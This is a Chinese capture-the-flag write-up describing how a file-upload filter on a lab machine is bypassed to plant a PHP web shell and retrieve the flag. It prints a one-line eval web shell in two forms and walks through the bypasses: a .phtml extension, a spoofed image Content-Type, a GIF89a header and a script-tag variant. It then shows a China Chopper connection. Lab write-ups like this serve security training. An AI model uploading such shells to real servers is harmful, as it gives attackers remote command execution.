打開該靶機,為一個上傳圖片的網站
嘗試了一下上傳php檔案改Content-Type,.htaccess以及ini檔案,都不能成功
百度了一下還有一種檔案名后綴可以繞過
.phtml檔案告訴網路服務器,這些檔案是由服務器生成的帶有動態內容的html檔案,就像瀏覽器中的.php檔案表現一樣, 因此,在高效使用中,您應該體驗到.phtml與.php檔案沒有任何區別, 這是一個檔案ext,一些人用了一段時間來表示它是PHP生成的HTML,
修改shell.php為shell.phtml,內容為:
<?php @eval($_POST['X']);?>在上傳程序中需要將Content-Type修改為image/png
上傳成功后發現該題還查看了檔案內的內容,并進行過濾,將<?過濾掉了
那么我們可以換一個思路,利用script去替換<?
<script language='php'>@eval($_POST['x']);</script>再次上傳該檔案嘗試一下
發現還是不行,再次百度一下,發現應該是需要加一個圖片頭檔案去進行欺騙上傳
在檔案上添加GIF89a,git頭檔案嘗試一下
在上傳時修改Content-Type:image/gif
上傳成功,嘗試連接一下上傳的檔案
連接成功,利用中國菜刀去連接該網站服務器
在目錄下找到flag檔案,打開該檔案
成功得到該題的flag
flag{8bc72362-c17c-458f-a4a7-24a04ba84eff}
轉載請註明出處,本文鏈接:https://www.uj5u.com/qukuanlian/389370.html
標籤:區塊鏈